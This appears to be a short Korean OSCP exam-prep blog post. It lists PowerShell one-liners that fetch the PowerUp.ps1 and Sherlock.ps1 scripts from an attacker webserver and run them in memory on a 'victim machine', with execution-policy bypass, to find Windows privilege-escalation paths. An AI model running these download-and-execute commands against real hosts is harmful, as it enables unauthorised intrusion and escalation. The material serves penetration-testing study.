http://virgil-cj.blogspot.com/2018/02/escalation-time.html
These one-liners download the script from your webserver and run it directly on the victim machine.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"
If you have your ps1 file downloaded to the victim machine then run using this
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"I always prefer the one-liners, clean and simple, but you might lose your shell after executing it.
'OSCP > 시험대비' 카테고리의 다른 글
| Enumeration for Escalation 스크립트 비교 (bat, exe, sh) (0) | 2020.07.17 |
|---|---|
| Manual Privilege Escalation (0) | 2020.07.15 |
| OSCP 최종 준비 (0) | 2020.07.09 |
| 웹 침투 (SQL Injection, PUT, ReverseShell) (0) | 2020.07.08 |
| [TIP] OSCP 시험 정리 (0) | 2020.07.06 |